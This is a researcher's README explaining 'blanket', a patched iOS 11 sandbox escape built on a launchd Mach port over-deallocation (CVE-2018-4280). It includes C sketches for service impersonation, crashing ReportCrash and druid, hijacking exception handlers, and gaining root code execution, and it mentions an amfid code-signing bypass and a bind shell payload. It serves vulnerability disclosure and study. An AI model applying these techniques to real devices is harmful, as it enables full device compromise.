Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allow entitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a “malicious” exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied by task_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORT special port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the “task” field. An equivalent API, thread_set_special_port, can be used to set a custom port in the “thread” field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a “malicious” exception message containing a Mach service port in place of the task and thread ports. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASH exceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abort function.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASH exception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port (a sketch in C follows the list below):

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.
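
Here is a minimal sketch in C of what the crasher does, assuming service_port is the send right returned by bootstrap_look_up for the target service. The EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES behavior is what produces the mach_exception_raise message that launchd’s service routine handles; the exact setup in blanket may differ.

#include <mach/mach.h>
#include <stdlib.h>

// Sketch of the crasher: redirect this thread's EXC_CRASH exceptions to launchd
// and substitute the target service port for our task and thread ports.
static void crash_with_service_port(mach_port_t service_port) {
    // 1. Deliver this thread's EXC_CRASH exceptions to launchd (the bootstrap
    //    port) as a mach_exception_raise message.
    thread_set_exception_ports(mach_thread_self(),
            EXC_MASK_CRASH,
            bootstrap_port,
            EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,
            THREAD_STATE_NONE);
    // 2. Make the kernel put the service port where the task and thread ports
    //    would normally go in any exception message it generates for us.
    task_set_special_port(mach_task_self(), TASK_KERNEL_PORT, service_port);
    thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, service_port);
    // 3. Generate an EXC_CRASH exception. launchd will over-deallocate "our"
    //    task and thread ports, which are really the service port.
    abort();
}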

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programmatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.
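
A sketch of the register-and-check loop, assuming registration via the deprecated bootstrap_register (blanket actually registers its dummy services under application-group names, and the service names below are made up). Because we hold the receive right to each dummy port, a send right that launchd hands back for the original service will coalesce to the same name in our IPC space if the reuse succeeded:

#include <bootstrap.h>
#include <mach/mach.h>
#include <stdbool.h>
#include <stdio.h>

// Register a batch of dummy services and test whether one of them landed on the
// freed port name backing `original_service`.
static bool try_reuse_freed_port(const char *original_service,
                                 mach_port_t *dummy_ports, size_t count) {
    for (size_t i = 0; i < count; i++) {
        char name[128];
        snprintf(name, sizeof(name), "group.com.example.blanket.dummy-%zu", i); // hypothetical name
        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &dummy_ports[i]);
        mach_port_insert_right(mach_task_self(), dummy_ports[i], dummy_ports[i],
                               MACH_MSG_TYPE_MAKE_SEND);
        bootstrap_register(bootstrap_port, name, dummy_ports[i]);
    }
    mach_port_t looked_up = MACH_PORT_NULL;
    if (bootstrap_look_up(bootstrap_port, original_service, &looked_up) != KERN_SUCCESS)
        return false;
    for (size_t i = 0; i < count; i++) {
        if (looked_up == dummy_ports[i])
            return true;    // one of our ports now backs the original service name
    }
    return false;           // no luck: deregister this batch and try the next one
}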

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASH, EXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.
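
For illustration, here is roughly what “send it any other type of Mach message” looks like; the msgh_id value is arbitrary, as long as it doesn’t correspond to a mach_exception_raise_state_identity message:

#include <bootstrap.h>
#include <mach/mach.h>

// Send a trivial, non-exception Mach message to a launchd service. This makes
// launchd spawn the service if it isn't running, and (per the behavior described
// above) makes ReportCrash stop handling new messages and eventually exit.
static kern_return_t poke_service(const char *service_name) {
    mach_port_t service = MACH_PORT_NULL;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, service_name, &service);
    if (kr != KERN_SUCCESS)
        return kr;
    mach_msg_header_t msg = { 0 };
    msg.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    msg.msgh_size        = sizeof(msg);
    msg.msgh_remote_port = service;
    msg.msgh_id          = 0x10000000;   // arbitrary: not an exception message ID
    return mach_msg(&msg, MACH_SEND_MSG, sizeof(msg), 0,
                    MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}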

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identity message that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the “task” port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the “task” port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.
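
Step 7 above boils down to a single call once we hold ReportCrash’s task port; here reportcrash_task stands for the port received in the mach_exception_raise message on our fake SafetyNet port:

#include <mach/mach.h>

// Because ReportCrash is unsandboxed and runs as root, its TASK_HOST_PORT
// special port is the host-priv port.
static kern_return_t get_host_priv(task_t reportcrash_task, mach_port_t *host_priv) {
    return task_get_special_port(reportcrash_task, TASK_HOST_PORT, host_priv);
}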

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth saving it for later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of “vulnerabilities” would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look at convert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.
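
Here is a sketch of the loophole, assuming we’re building for arm64 and hold a task port (druid_task) that we can only use as a task_inspect_t: task_threads still hands back full thread rights that thread_get_state and thread_set_state accept.

#include <mach/mach.h>

// Enumerate the threads of a platform binary's task and read the first thread's
// register state, even though the task port itself can't be converted to a
// full task_t by a non-platform caller.
static kern_return_t read_first_thread_state(task_t druid_task,
                                             arm_thread_state64_t *state) {
    thread_act_array_t threads = NULL;
    mach_msg_type_number_t thread_count = 0;
    kern_return_t kr = task_threads(druid_task, &threads, &thread_count); // no task_conversion_eval
    if (kr != KERN_SUCCESS || thread_count == 0)
        return kr;
    mach_msg_type_number_t state_count = ARM_THREAD_STATE64_COUNT;
    kr = thread_get_state(threads[0], ARM_THREAD_STATE64,
                          (thread_state_t)state, &state_count);
    // thread_set_state(threads[0], ARM_THREAD_STATE64, ...) works as well, which
    // is the basis for building a function-call primitive in the target task.
    return kr;
}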

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.
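
The host_set_exception_ports call in step 4 might look like the following when made from inside druid; host_priv and new_exc_port are the rights we sent over, and this is a sketch rather than blanket’s exact code:

#include <mach/mach.h>

// Sketch of step 4, as run inside druid: save the existing EXC_BAD_ACCESS
// handler(s) for stage 5, then install our own port as the host-level handler.
static kern_return_t install_host_handler(mach_port_t host_priv, mach_port_t new_exc_port) {
    exception_mask_t       old_masks[EXC_TYPES_COUNT];
    mach_msg_type_number_t old_count = EXC_TYPES_COUNT;
    mach_port_t            old_ports[EXC_TYPES_COUNT];
    exception_behavior_t   old_behaviors[EXC_TYPES_COUNT];
    thread_state_flavor_t  old_flavors[EXC_TYPES_COUNT];

    host_get_exception_ports(host_priv, EXC_MASK_BAD_ACCESS,
            old_masks, &old_count, old_ports, old_behaviors, old_flavors);

    return host_set_exception_ports(host_priv, EXC_MASK_BAD_ACCESS, new_exc_port,
            EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
}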

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESS exception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.
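
A sketch of the handler side, assuming the usual approach of running the MIG-generated mach_exc_server (from mach_exc.defs) over our exception handler port; saved_task, saved_thread, and reportcrash_pid are illustrative globals, and the sibling catch_mach_exception_raise_state* callbacks (not shown) just return KERN_FAILURE:

#include <mach/mach.h>
#include <mach/mach_traps.h>

static mach_port_t saved_task, saved_thread;   // rights kept for the execution context
static int reportcrash_pid;                    // PID of the ReportCrash instance we crashed

// Invoked by mach_exc_server() when an exception message arrives on our
// host-level handler port. For ReportCrash's EXC_BAD_ACCESS, stash the ports,
// park the faulting thread, and report success so the kernel resumes the task.
kern_return_t catch_mach_exception_raise(
        mach_port_t            exception_port,
        mach_port_t            thread,
        mach_port_t            task,
        exception_type_t       exception,
        mach_exception_data_t  code,
        mach_msg_type_number_t codeCnt)
{
    int pid = -1;
    pid_for_task(task, &pid);
    if (exception == EXC_BAD_ACCESS && pid == reportcrash_pid) {
        saved_task   = task;
        saved_thread = thread;
        thread_suspend(thread);   // keep the crashing thread from running again
        return KERN_SUCCESS;      // tell the kernel the exception was handled
    }
    return KERN_FAILURE;          // not the crash we're waiting for
}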

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damage itself.
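
A sketch of the per-service fix-up; launchd_task comes from task_for_pid(mach_task_self(), 1, ...), and original_name and real_service_port are assumed to have been recorded by the exploit before the attack. The two calls run in different contexts: the destroy in our app, which owns the receive right, and the insert in ReportCrash, with the needed rights transferred into that execution context.

#include <mach/mach.h>

// Step 2.2, in our app: destroying the receive right deregisters the fake
// service with launchd.
static void unregister_fake_service(mach_port_t fake_service_port) {
    mach_port_destroy(mach_task_self(), fake_service_port);
}

// Step 2.3, inside ReportCrash: push a send right to the real service port back
// into launchd's IPC space under the name it originally occupied.
static kern_return_t restore_real_service(mach_port_t launchd_task,
                                          mach_port_name_t original_name,
                                          mach_port_t real_service_port) {
    return mach_port_insert_right(launchd_task, original_name,
                                  real_service_port, MACH_MSG_TYPE_COPY_SEND);
}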

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawn to launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

